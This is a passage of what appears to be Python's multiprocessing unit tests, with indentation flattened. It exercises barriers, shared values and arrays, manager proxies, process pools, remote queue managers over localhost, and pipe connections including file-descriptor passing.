barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
e[:],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[:], [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello']])
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
    def test_map_unpicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(1000)))
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=53)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
expected_error = (RemoteError if self.TYPE == 'manager'
else ValueError)
self.assertRaises(expected_error, self.Pool, -1)
self.assertRaises(expected_error, self.Pool, 0)
if self.TYPE != 'manager':
p = self.Pool(3)
try:
self.assertEqual(3, len(p._pool))
finally:
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
# Sanity check the pool didn't wait for all tasks to finish
self.assertLess(join.elapsed, 2.0)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with self.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
        # We want to ensure that the traceback from the child process is
        # contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
raise AssertionError('expected RuntimeError')
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
def test_map_no_failfast(self):
# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.time()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.time() - t_start, 0.9)
def raising():
raise KeyError("key")
def unpickleable_result():
return lambda: 42
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def test_unpickleable_result(self):
from multiprocessing.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
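def _mymanager_usage_sketch():
    # Illustrative sketch (not invoked by the test suite) of driving the
    # customized manager directly: 'Foo' exposes all public methods, 'Bar'
    # only the explicit ('f', '_h') pair, and 'baz' yields its values
    # through IteratorProxy.
    with MyManager() as manager:
        assert manager.Foo().f() == 'f()'
        assert list(manager.baz()) == [i * i for i in range(10)]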
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# If the manager process exited cleanly then the exitcode
# will be zero. Otherwise (after a short timeout)
# terminate() is used, resulting in an exitcode of -SIGTERM.
self.assertEqual(manager._process.exitcode, 0)
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
        # Note that xmlrpclib will deserialize the object as a list, not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
manager.shutdown()
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER)
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
manager.shutdown()
#
#
#
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
        really_big_msg = latin('X') * (1024 * 1024 * 16)   # 16 MiB
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
        # We test that a pipe connection can be closed by the parent
        # process immediately after the child is spawned. On Windows
        # this sometimes failed on old versions because child_conn
        # would be closed before the child got a chance to duplicate
        # it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
def _send_data_without_fd(cls, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
